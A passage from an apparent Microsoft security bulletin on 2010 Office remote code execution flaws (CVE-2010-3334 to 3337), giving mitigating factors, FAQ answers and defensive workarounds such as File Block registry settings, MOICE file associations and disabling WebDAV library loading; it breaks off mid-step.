5.00\r\n\r\n[HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\PowerPoint\Security\FileOpenBlock]\r\n\r\n"BinaryFiles"=dword:00000000\r\n\r\nFor Office 2007\r\n\r\nWindows Registry Editor Version 5.00\r\n\r\n[HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\12.0\PowerPoint\Security\FileOpenBlock]\r\n\r\n"BinaryFiles"=dword:00000000\r\n\r\nFor Office 2010 \r\n\r\nOpen PowerPoint 2010 and follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nClick the File tab.\r\n\r\n2.\r\n\t\r\n\r\nUnder Help, click Options.\r\n\r\n3.\r\n\t\r\n\r\nClick Trust Center, and then click Trust Center Settings.\r\n\r\n4.\r\n\t\r\n\r\nIn the Trust Center, click File Block Settings.\r\n\r\n5.\r\n\t\r\n\r\nClear the Open check box for the file types that you previously selected.\r\n\r\n6.\r\n\t\r\n\r\nClick OK to apply the File Block settings.\r\n\u2022\t\r\n\r\nUse the Microsoft Office Isolated Conversion Environment (MOICE) when opening files from unknown or untrusted sources\r\n\r\nThe Microsoft Office Isolated Conversion Environment (MOICE) helps protect Office 2003 installations by more securely opening Word, Excel, and PowerPoint binary format files.\r\n\r\nTo install MOICE, you must have Office 2003 or Office 2007 installed.\r\n\r\nTo install MOICE, you must also have the Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats. The compatibility pack is available as a free download from the Microsoft Download Center.\r\n\r\nMOICE requires all updates that are recommended for all Office programs. Visit Microsoft Update to install all recommended updates.\r\n\r\nEnable MOICE\r\n\r\nNote See Microsoft Knowledge Base Article 935865 to use the automated Microsoft Fix it solution to enable or disable this workaround.\r\n\r\nTo manually enable MOICE, run the commands as specified in the following table. Running the commands will associate the Office application extensions with MOICE.\r\nCommand to enable MOICE to be the registered handler\r\n\r\nFor Word, run the following command from a command prompt:\r\nASSOC .doc=oice.word.document\r\n\r\nFor Excel, run the following commands from a command prompt:\r\nASSOC .XLS=oice.excel.sheet\r\nASSOC .XLT=oice.excel.template\r\nASSOC .XLA=oice.excel.addin\r\n\r\nFor PowerPoint, run the following commands from a command prompt:\r\nASSOC .PPT=oice.powerpoint.show\r\nASSOC .POT=oice.powerpoint.template\r\nASSOC .PPS=oice.powerpoint.slideshow\r\n\r\nNote On Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2, run the above commands from an elevated command prompt.\r\n\r\nFor more information on MOICE, see Microsoft Knowledge Base Article 935865.\r\n\r\nImpact of workaround. Office 2003 and earlier formatted documents that are converted to the Microsoft Office 2007 Open XML format by MOICE will not retain macro functionality. Additionally, documents with passwords or that are protected with Digital Rights Management cannot be converted.\r\n\r\nHow to undo the workaround. Run the commands to disable MOICE as specified in the table below.\r\nCommand to disable MOICE as the registered handler\r\n\r\nFor Word, run the following command from a command prompt:\r\nASSOC .doc=Word.Document.8\r\n\r\nFor Excel, run the following commands from a command prompt:\r\nASSOC .xls=Excel.Sheet.8\r\nASSOC .xlt=Excel.Template\r\nASSOC .xla=Excel.Addin\r\n\r\nFor PowerPoint, run the following commands from a command prompt:\r\nASSOC .ppt=PowerPoint.Show.8\r\nASSOC .PPS=oice.powerpoint.slideshow\r\nASSOC .pps=PowerPoint.SlideShow.8\r\n\r\nNote On Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2, run the above commands from an elevated command prompt.\r\n\u2022\t\r\n\r\nDo not open Office files that you receive from untrusted sources or that you receive unexpectedly from trusted sources\r\n\r\nDo not open Office files that you receive from untrusted sources or that you receive unexpectedly from trusted sources. This vulnerability could be exploited when a user opens a specially crafted file.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for Office Art Drawing Records Vulnerability - CVE-2010-3334\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nWhat causes the vulnerability? \r\nWhen a user opens a specially crafted Office file, system memory may become corrupted in such a way that an attacker could execute arbitrary code.\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nAn attacker who successfully exploited this vulnerability could run arbitrary code as the logged-on user. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. If a user is logged-on with administrative user rights, an attacker could take complete control of the affected system. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nThis vulnerability requires that a user open a specially crafted Office file with an affected version of Microsoft Office software.\r\n\r\nIn an e-mail attack scenario, an attacker could exploit the vulnerability by sending a specially crafted Office file to the user and by convincing the user to open the file.\r\n\r\nIn a Web-based attack scenario, an attacker could host a Web site that contains an Office file that is used to attempt to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or host user-provided content could contain specially crafted content that could exploit this vulnerability. An attacker would have no way to force users to visit a specially crafted Web site. Instead, an attacker would have to convince them to visit the Web site, typically by getting them to click a link that takes them to the attacker's site, and then convince them to open the specially crafted Office file.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nSystems where Microsoft Office software is used, including workstations and terminal servers, are primarily at risk. Servers could be at more risk if administrators allow users to log on to servers and to run programs. However, best practices strongly discourage allowing this.\r\n\r\nWhat does the update do? \r\nThe update addresses the vulnerability by modifying the way that Microsoft Office software parses files.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nNo. Microsoft received information about this vulnerability through coordinated vulnerability disclosure.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers when this security bulletin was originally issued.\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\n\t\r\nDrawing Exception Handling Vulnerability - CVE-2010-3335\r\n\r\nA remote code execution vulnerability exists in the way that Microsoft Office software parses specially crafted Office files. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2010-3335.\r\n\t\r\nMitigating Factors for Drawing Exception Handling Vulnerability - CVE-2010-3335\r\n\r\nMitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation:\r\n\u2022\t\r\n\r\nThe vulnerability cannot be exploited automatically through e-mail. For an attack to be successful a user must open an attachment that is sent in an e-mail message.\r\n\u2022\t\r\n\r\nAn attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\u2022\t\r\n\r\nIn a Web-based attack scenario, an attacker could host a Web site that contains a Web page that is used to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or host user-provided content or advertisements could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to convince users to visit the Web site, typically by getting them to click a link in an e-mail message or Instant Messenger message that takes users to the attacker\u2019s Web site, and then convince them to open the specially crafted Office file.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for Drawing Exception Handling Vulnerability - CVE-2010-3335\r\n\r\nWorkaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:\r\n\u2022\t\r\n\r\nUse Microsoft Office File Block policy to block the opening of Office 2003 and earlier documents in Microsoft Word from unknown or untrusted sources and locations\r\n\r\nThe following registry scripts can be used to set the File Block policy.\r\n\r\nNote Modifying the Registry incorrectly can cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that problems resulting from incorrect modification of the Registry can be solved. Modify the Registry at your own risk.\r\n\r\nFor Office 2003 \r\n\r\nWindows Registry Editor Version 5.00\r\n\r\n[HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Word\Security\FileOpenBlock]\r\n\r\n"BinaryFiles"=dword:00000001\r\n\r\nNote In order to use 'FileOpenBlock' with Microsoft Office 2003, all of the latest security updates for Microsoft Office 2003 must be applied.\r\n\r\nFor Office 2007 \r\n\r\nWindows Registry Editor Version 5.00\r\n\r\n[HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\12.0\Word\Security\FileOpenBlock]\r\n\r\n"BinaryFiles"=dword:00000001\r\n\r\nNote In order to use 'FileOpenBlock' with Office 2007, all of the latest security updates for Microsoft Office 2007 must be applied.\r\n\r\nFor Office 2010 \r\n\r\nOpen Word 2010 and follow the steps below:\r\n\r\n1.\r\n\t\r\n\r\nClick the File tab.\r\n\r\n2.\r\n\t\r\n\r\nUnder Help, click Options.\r\n\r\n3.\r\n\t\r\n\r\nClick Trust Center, and then click Trust Center Settings.\r\n\r\n4.\r\n\t\r\n\r\nIn the Trust Center, click File Block Settings.\r\n\r\n5.\r\n\t\r\n\r\nEnsure the Open check box is selected for the following file types:\r\n- Word 2003 Binary Documents and Templates\r\n- Word XP Binary Documents and Templates\r\n- Word 2000 Binary Documents and Templates\r\n- Word 97 Binary Documents and Templates\r\n- Word 95 Binary Documents and Templates\r\n- Word 6.0 Binary Documents and Templates\r\n- Word 2 and earlier Binary Documents and Templates\r\n\r\n6.\r\n\t\r\n\r\nUnder Open behavior for selected file types, select "Do not open selected file types" or select "Open selected file types in Protected View". Either choice will block the attack vector to the vulnerable code.\r\n\r\n7.\r\n\t\r\n\r\nClick OK to apply the File Block Settings.\r\n\r\nAlternatively, file block can be applied using Group Policy. For more information, see the TechNet article, Plan file block settings for Office 2010.\r\n\r\nImpact of workaround. For Microsoft Office 2003 and Microsoft Office 2007, users who have configured the File Block policy and have not configured a special exempt directory or have not moved files to a trusted location as discussed in Microsoft Knowledge Base Article 922848 will be unable to open Office 2003 files or earlier versions. For Microsoft Office 2010, Office 2003 files or earlier versions will either be blocked from opening or will be opened in protected mode depending on the open behavior that was selected.\r\n\r\nHow to undo the workaround.\r\n\r\nFor Office 2003\r\n\r\nWindows Registry Editor Version 5.00\r\n\r\n[HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Word\Security\FileOpenBlock]\r\n\r\n"BinaryFiles"=dword:00000000\r\n\r\nFor Office 2007\r\n\r\nWindows Registry Editor Version 5.00\r\n\r\n[HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\12.0\Word\Security\FileOpenBlock]\r\n\r\n"BinaryFiles"=dword:00000000\r\n\r\nFor Office 2010 \r\n\r\nOpen Word 2010 and follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nClick the File tab.\r\n\r\n2.\r\n\t\r\n\r\nUnder Help, click Options.\r\n\r\n3.\r\n\t\r\n\r\nClick Trust Center, and then click Trust Center Settings.\r\n\r\n4.\r\n\t\r\n\r\nIn the Trust Center, click File Block Settings.\r\n\r\n5.\r\n\t\r\n\r\nClear the Open check box for the file types that you previously selected.\r\n\r\n6.\r\n\t\r\n\r\nClick OK to apply the File Block settings.\r\n\u2022\t\r\n\r\nUse Microsoft Office File Block policy to block the opening of Office 2003 and earlier documents in Microsoft Excel from unknown or untrusted sources and locations\r\n\r\nThe following registry scripts can be used to set the File Block policy.\r\n\r\nNote Modifying the Registry incorrectly can cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that problems resulting from incorrect modification of the Registry can be solved. Modify the Registry at your own risk.\r\n\r\nFor Office 2003 \r\n\r\nWindows Registry Editor Version 5.00\r\n\r\n[HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Excel\Security\FileOpenBlock]\r\n\r\n"BinaryFiles"=dword:00000001\r\n\r\nNote In order to use 'FileOpenBlock' with Microsoft Office 2003, all of the latest security updates for Microsoft Office 2003 must be applied.\r\n\r\nFor Office 2007 \r\n\r\nWindows Registry Editor Version 5.00\r\n\r\n[HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\12.0\Excel\Security\FileOpenBlock]\r\n\r\n"BinaryFiles"=dword:00000001\r\n\r\nNote In order to use 'FileOpenBlock' with Microsoft Office 2007, all of the latest security updates for Office 2007 must be applied.\r\n\r\nFor Office 2010 \r\n\r\nOpen Excel 2010 and follow the steps below:\r\n\r\n1.\r\n\t\r\n\r\nClick the File tab.\r\n\r\n2.\r\n\t\r\n\r\nUnder Help, click Options.\r\n\r\n3.\r\n\t\r\n\r\nClick Trust Center, and then click Trust Center Settings.\r\n\r\n4.\r\n\t\r\n\r\nIn the Trust Center, click File Block Settings.\r\n\r\n5.\r\n\t\r\n\r\nEnsure the Open check box is selected for the following file types:\r\n- Excel 2007 and later Binary Workbooks\r\n- Excel 97-2003 Add-in Files\r\n- Excel 97-2003 Workbooks and Templates\r\n- Excel 95-97 Workbooks and Templates\r\n- Excel 95 Workbooks\r\n- Excel 4 Workbooks\r\n- Excel 4 Worksheets\r\n- Excel 3 Worksheets\r\n- Excel 2 Worksheets\r\n\r\n6.\r\n\t\r\n\r\nUnder Open behavior for selected file types, select "Do not open selected file types" or select "Open selected file types in Protected View". Either choice will block the attack vector to the vulnerable code.\r\n\r\n7.\r\n\t\r\n\r\nClick OK to apply the File Block Settings.\r\n\r\nAlternatively, file block can be applied using Group Policy. For more information, see the TechNet article, Plan file block settings for Office 2010.\r\n\r\nImpact of workaround. For Microsoft Office 2003 and Microsoft Office 2007, users who have configured the File Block policy and have not configured a special exempt directory or have not moved files to a trusted location as discussed in Microsoft Knowledge Base Article 922848 will be unable to open Office 2003 files or earlier versions. For Microsoft Office 2010, Office 2003 files or earlier versions will either be blocked from opening or will be opened in protected mode depending on the open behavior that was selected.\r\n\r\nHow to undo the workaround.\r\n\r\nFor Office 2003\r\n\r\nWindows Registry Editor Version 5.00\r\n\r\n[HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Excel\Security\FileOpenBlock]\r\n\r\n"BinaryFiles"=dword:00000000\r\n\r\nFor Office 2007\r\n\r\nWindows Registry Editor Version 5.00\r\n\r\n[HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\12.0\Excel\Security\FileOpenBlock]\r\n\r\n"BinaryFiles"=dword:00000000\r\n\r\nFor Office 2010 \r\n\r\nOpen Excel 2010 and follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nClick the File tab.\r\n\r\n2.\r\n\t\r\n\r\nUnder Help, click Options.\r\n\r\n3.\r\n\t\r\n\r\nClick Trust Center, and then click Trust Center Settings.\r\n\r\n4.\r\n\t\r\n\r\nIn the Trust Center, click File Block Settings.\r\n\r\n5.\r\n\t\r\n\r\nClear the Open check box for the file types that you previously selected.\r\n\r\n6.\r\n\t\r\n\r\nClick OK to apply the File Block settings.\r\n\u2022\t\r\n\r\nUse Microsoft Office File Block policy to block the opening of Office 2003 and earlier documents in Microsoft PowerPoint from unknown or untrusted sources and locations\r\n\r\nThe following registry scripts can be used to set the File Block policy.\r\n\r\nNote Modifying the Registry incorrectly can cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that problems resulting from incorrect modification of the Registry can be solved. Modify the Registry at your own risk.\r\n\r\nFor Office 2003 \r\n\r\nWindows Registry Editor Version 5.00\r\n\r\n[HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\PowerPoint\Security\FileOpenBlock]\r\n\r\n"BinaryFiles"=dword:00000001\r\n\r\nNote In order to use 'FileOpenBlock' with Microsoft Office 2003, all of the latest security updates for Microsoft Office 2003 must be applied.\r\n\r\nFor Office 2007 \r\n\r\nWindows Registry Editor Version 5.00\r\n\r\n[HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\12.0\PowerPoint\Security\FileOpenBlock]\r\n\r\n"BinaryFiles"=dword:00000001\r\n\r\nNote In order to use 'FileOpenBlock' with the 2007 Microsoft Office system, all of the latest security updates for the 2007 Microsoft Office system must be applied.\r\n\r\nFor Office 2010 \r\n\r\nOpen PowerPoint 2010 and follow the steps below:\r\n\r\n1.\r\n\t\r\n\r\nClick the File tab.\r\n\r\n2.\r\n\t\r\n\r\nUnder Help, click Options.\r\n\r\n3.\r\n\t\r\n\r\nClick Trust Center, and then click Trust Center Settings.\r\n\r\n4.\r\n\t\r\n\r\nIn the Trust Center, click File Block Settings.\r\n\r\n5.\r\n\t\r\n\r\nEnsure the Open check box is selected for the following file types:\r\n- PowerPoint 97-2003 Presentations, Shows, Templates and Add-in Files\r\n\r\n6.\r\n\t\r\n\r\nUnder Open behavior for selected file types, select "Do not open selected file types" or select "Open selected file types in Protected View". Either choice will block the attack vector to the vulnerable code.\r\n\r\n7.\r\n\t\r\n\r\nClick OK to apply the File Block Settings.\r\n\r\nAlternatively, file block can be applied using Group Policy. For more information, see the TechNet article, Plan file block settings for Office 2010.\r\n\r\nImpact of workaround. For Microsoft Office 2003 and Microsoft Office 2007, users who have configured the File Block policy and have not configured a special exempt directory or have not moved files to a trusted location as discussed in Microsoft Knowledge Base Article 922848 will be unable to open Office 2003 files or earlier versions. For Microsoft Office 2010, Office 2003 files or earlier versions will either be blocked from opening or will be opened in protected mode depending on the open behavior that was selected.\r\n\r\nHow to undo the workaround.\r\n\r\nFor Office 2003\r\n\r\nWindows Registry Editor Version 5.00\r\n\r\n[HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\PowerPoint\Security\FileOpenBlock]\r\n\r\n"BinaryFiles"=dword:00000000\r\n\r\nFor Office 2007\r\n\r\nWindows Registry Editor Version 5.00\r\n\r\n[HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\12.0\PowerPoint\Security\FileOpenBlock]\r\n\r\n"BinaryFiles"=dword:00000000\r\n\r\nFor Office 2010 \r\n\r\nOpen PowerPoint 2010 and follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nClick the File tab.\r\n\r\n2.\r\n\t\r\n\r\nUnder Help, click Options.\r\n\r\n3.\r\n\t\r\n\r\nClick Trust Center, and then click Trust Center Settings.\r\n\r\n4.\r\n\t\r\n\r\nIn the Trust Center, click File Block Settings.\r\n\r\n5.\r\n\t\r\n\r\nClear the Open check box for the file types that you previously selected.\r\n\r\n6.\r\n\t\r\n\r\nClick OK to apply the File Block settings.\r\n\u2022\t\r\n\r\nUse the Microsoft Office Isolated Conversion Environment (MOICE) when opening files from unknown or untrusted sources\r\n\r\nThe Microsoft Office Isolated Conversion Environment (MOICE) helps protect Office 2003 installations by more securely opening Word, Excel, and PowerPoint binary format files.\r\n\r\nTo install MOICE, you must have Office 2003 or Office 2007 installed.\r\n\r\nTo install MOICE, you must also have the Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats. The compatibility pack is available as a free download from the Microsoft Download Center.\r\n\r\nMOICE requires all updates that are recommended for all Office programs. Visit Microsoft Update to install all recommended updates.\r\n\r\nEnable MOICE\r\n\r\nNote See Microsoft Knowledge Base Article 935865 to use the automated Microsoft Fix it solution to enable or disable this workaround.\r\n\r\nTo manually enable MOICE, run the commands as specified in the following table. Running the commands will associate the Office application extensions with MOICE.\r\nCommand to enable MOICE to be the registered handler\r\n\r\nFor Word, run the following command from a command prompt:\r\nASSOC .doc=oice.word.document\r\n\r\nFor Excel, run the following commands from a command prompt:\r\nASSOC .XLS=oice.excel.sheet\r\nASSOC .XLT=oice.excel.template\r\nASSOC .XLA=oice.excel.addin\r\n\r\nFor PowerPoint, run the following commands from a command prompt:\r\nASSOC .PPT=oice.powerpoint.show\r\nASSOC .POT=oice.powerpoint.template\r\nASSOC .PPS=oice.powerpoint.slideshow\r\n\r\nNote On Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2, run the above commands from an elevated command prompt.\r\n\r\nFor more information on MOICE, see Microsoft Knowledge Base Article 935865.\r\n\r\nImpact of workaround. Office 2003 and earlier formatted documents that are converted to the Microsoft Office 2007 Open XML format by MOICE will not retain macro functionality. Additionally, documents with passwords or that are protected with Digital Rights Management cannot be converted.\r\n\r\nHow to undo the workaround. Run the commands to disable MOICE as specified in the table below.\r\nCommand to disable MOICE as the registered handler\r\n\r\nFor Word, run the following command from a command prompt:\r\nASSOC .doc=Word.Document.8\r\n\r\nFor Excel, run the following commands from a command prompt:\r\nASSOC .xls=Excel.Sheet.8\r\nASSOC .xlt=Excel.Template\r\nASSOC .xla=Excel.Addin\r\n\r\nFor PowerPoint, run the following commands from a command prompt:\r\nASSOC .ppt=PowerPoint.Show.8\r\nASSOC .PPS=oice.powerpoint.slideshow\r\nASSOC .pps=PowerPoint.SlideShow.8\r\n\r\nNote On Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2, run the above commands from an elevated command prompt.\r\n\u2022\t\r\n\r\nDo not open Office files that you receive from untrusted sources or that you receive unexpectedly from trusted sources\r\n\r\nDo not open Office files that you receive from untrusted sources or that you receive unexpectedly from trusted sources. This vulnerability could be exploited when a user opens a specially crafted file.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for Drawing Exception Handling Vulnerability - CVE-2010-3335\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nWhat causes the vulnerability? \r\nWhen a user opens a specially crafted Office file, system memory may become corrupted in such a way that an attacker could execute arbitrary code.\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nAn attacker who successfully exploited this vulnerability could run arbitrary code as the logged-on user. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. If a user is logged-on with administrative user rights, an attacker could take complete control of the affected system. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nThis vulnerability requires that a user open a specially crafted Office file with an affected version of Microsoft Office software.\r\n\r\nIn an e-mail attack scenario, an attacker could exploit the vulnerability by sending a specially crafted Office file to the user and by convincing the user to open the file.\r\n\r\nIn a Web-based attack scenario, an attacker could host a Web site that contains an Office file that is used to attempt to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or host user-provided content could contain specially crafted content that could exploit this vulnerability. An attacker would have no way to force users to visit a specially crafted Web site. Instead, an attacker would have to convince them to visit the Web site, typically by getting them to click a link that takes them to the attacker's site, and then convince them to open the specially crafted Office file.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nSystems where Microsoft Office software is used, including workstations and terminal servers, are primarily at risk. Servers could be at more risk if administrators allow users to log on to servers and to run programs. However, best practices strongly discourage allowing this.\r\n\r\nWhat does the update do? \r\nThe update addresses the vulnerability by modifying the way that Microsoft Office parses Office files.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nNo. Microsoft received information about this vulnerability through coordinated vulnerability disclosure.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers when this security bulletin was originally issued.\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\n\t\r\nMSO Large SPID Read AV Vulnerability - CVE-2010-3336\r\n\r\nA remote code execution vulnerability exists in the way that Microsoft Office software parses specially crafted Office files. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2010-3336.\r\n\t\r\nMitigating Factors for MSO Large SPID Read AV Vulnerability - CVE-2010-3336\r\n\r\nMitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation:\r\n\u2022\t\r\n\r\nThe vulnerability cannot be exploited automatically through e-mail. For an attack to be successful a user must open an attachment that is sent in an e-mail message.\r\n\u2022\t\r\n\r\nAn attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\u2022\t\r\n\r\nIn a Web-based attack scenario, an attacker could host a Web site that contains a Web page that is used to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or host user-provided content or advertisements could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to convince users to visit the Web site, typically by getting them to click a link in an e-mail message or Instant Messenger message that takes users to the attacker\u2019s Web site, and then convince them to open the specially crafted Office file.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for MSO Large SPID Read AV Vulnerability - CVE-2010-3336\r\n\r\nWorkaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:\r\n\u2022\t\r\n\r\nDo not open Office files that you receive from untrusted sources or that you receive unexpectedly from trusted sources\r\n\r\nDo not open Office files that you receive from untrusted sources or that you receive unexpectedly from trusted sources. This vulnerability could be exploited when a user opens a specially crafted file.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for MSO Large SPID Read AV Vulnerability - CVE-2010-3336\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nWhat causes the vulnerability? \r\nWhen a user opens a specially crafted Office file, system memory may become corrupted in such a way that an attacker could execute arbitrary code.\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nAn attacker who successfully exploited this vulnerability could run arbitrary code as the logged-on user. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. If a user is logged-on with administrative user rights, an attacker could take complete control of the affected system. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nThis vulnerability requires that a user open a specially crafted Office file with an affected version of Microsoft Office software.\r\n\r\nIn an e-mail attack scenario, an attacker could exploit the vulnerability by sending a specially crafted Office file to the user and by convincing the user to open the file.\r\n\r\nIn a Web-based attack scenario, an attacker could host a Web site that contains an Office file that is used to attempt to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or host user-provided content could contain specially crafted content that could exploit this vulnerability. An attacker would have no way to force users to visit a specially crafted Web site. Instead, an attacker would have to convince them to visit the Web site, typically by getting them to click a link that takes them to the attacker's site, and then convince them to open the specially crafted Office file.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nSystems where Microsoft Office software is used, including workstations and terminal servers, are primarily at risk. Servers could be at more risk if administrators allow users to log on to servers and to run programs. However, best practices strongly discourage allowing this.\r\n\r\nWhat does the update do? \r\nThe update addresses the vulnerability by modifying the way that Microsoft Office parses files.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nNo. Microsoft received information about this vulnerability through coordinated vulnerability disclosure.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers when this security bulletin was originally issued.\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\n\t\r\nInsecure Library Loading Vulnerability - CVE-2010-3337\r\n\r\nA remote code execution vulnerability exists in the way that Microsoft Office handles the loading of DLL files. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2010-3337.\r\n\t\r\nMitigating Factors for Insecure Library Loading Vulnerability - CVE-2010-3337\r\n\r\nMitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation:\r\n\u2022\t\r\n\r\nFor an attack to be successful using an untrusted remote file system location or WebDAV share, a user must be convinced to open a PowerPoint presentation located on the remote file system location or WebDAV share. An attacker would have no way to force users to visit an untrusted remote file system location or WebDAV share. Instead, an attacker would have to convince them to visit the untrusted remote file system location or WebDAV share, typically by getting them to click a link in an e-mail message or Instant Messenger message that takes them to the untrusted remote file system location or WebDAV share.\r\n\u2022\t\r\n\r\nThe file sharing protocol SMB is often disabled on the perimeter firewall. This limits the potential attack vectors.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for Insecure Library Loading Vulnerability - CVE-2010-3337\r\n\r\nWorkaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:\r\n\u2022\t\r\n\r\nDisable loading of libraries from WebDAV and remote network shares\r\n\r\nNote See Microsoft Knowledge Base Article 2264107 to deploy a workaround tool that allows customers to disable the loading of libraries from remote network or WebDAV shares. This tool can be configured to disallow insecure loading on a per-application or a global system basis.\r\n\r\nCustomers who are informed by their vendor of an application being vulnerable can use this tool to help protect against attempts to exploit this issue.\r\n\r\nNote See Microsoft Knowledge Base Article 2264107 to use the automated Microsoft Fix it solution to deploy the registry key to block loading of libraries for SMB and WebDAV shares. Note that this Fix it solution does require you to install the workaround tool also described in Microsoft Knowledge Base Article 2264107 first. This Fix it solution only deploys the registry key and requires the workaround tool in order to be effective. We recommend that administrators review the KB article closely prior to deploying this Fix it solution.\r\n\u2022\t\r\n\r\nDisable the WebClient service\r\n\r\nDisabling the WebClient service helps protect affected systems from attempts to exploit this vulnerability by blocking the most likely remote attack vector through the Web Distributed Authoring and Versioning (WebDAV) client service. After applying this workaround it is still possible for remote attackers who successfully exploit this vulnerability to cause Microsoft Office Outlook to run programs located on the targeted user's computer or the Local Area Network (LAN), but users will be prompted for confirmation before opening arbitrary programs from the Internet.\r\n\r\nTo disable the WebClient Service, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nClick Start, click Run, type 